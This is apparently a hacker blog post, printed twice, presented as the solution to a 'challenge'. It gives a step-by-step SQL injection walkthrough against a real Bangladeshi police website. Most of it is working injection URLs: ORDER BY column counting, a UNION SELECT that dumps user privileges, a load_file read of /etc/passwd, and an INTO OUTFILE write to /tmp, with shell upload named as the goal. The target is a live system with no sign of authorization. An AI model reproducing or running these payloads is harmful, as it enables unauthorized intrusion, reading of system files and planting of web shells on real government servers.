SQLi Challenge Solution 2
Okay First hello to all :p .. The Method is used in this Challenge is Root Privilleges Method.
Okay then let's start :
1. First of all we'll see that site is vuln or not.
http://www.police.gov.bd/content.php?id=275' > Error :D Text disappeared it means it's vuln
2. Now Time to find which comment is working
http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error It means we've to try now String Based SQLi
http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D its working
2. Now We've to Dump Vuln Columns
http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error
So, Total Columns are 16.
Now We've to dump Columns.
http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3
3. Now we've to see that Website have root privilleges or not.
To see it we've to use this query.
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)
Use it in vuln column.
http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.
4. Now We've to Check website path for Upload shell
Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :
load_file('/etc/passwd')
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
:'( No luck no path there
5. If You can't able to find the path then remember tmp dir is always writable ^_^
To Upload file in tmp folder we'll use following Command
into outfile '/tmp/test.txt'
http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+
6. To Open your uploaded file We'll use load_file
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Wahoooooo :)))) It's working .....
Hope You like my tutorial ( Solution of 2nd Challenge ) .
#D4RK_4NG31
Okay then let's start :
1. First of all we'll see that site is vuln or not.
http://www.police.gov.bd/content.php?id=275' > Error :D Text disappeared it means it's vuln
2. Now Time to find which comment is working
http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error It means we've to try now String Based SQLi
http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D its working
2. Now We've to Dump Vuln Columns
http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error
So, Total Columns are 16.
Now We've to dump Columns.
http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3
3. Now we've to see that Website have root privilleges or not.
To see it we've to use this query.
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)
Use it in vuln column.
http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.
4. Now We've to Check website path for Upload shell
Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :
load_file('/etc/passwd')
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
:'( No luck no path there
5. If You can't able to find the path then remember tmp dir is always writable ^_^
To Upload file in tmp folder we'll use following Command
into outfile '/tmp/test.txt'
http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+
6. To Open your uploaded file We'll use load_file
http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+
Wahoooooo :)))) It's working .....
Hope You like my tutorial ( Solution of 2nd Challenge ) .
#D4RK_4NG31
Subscribe to:
Posts (Atom)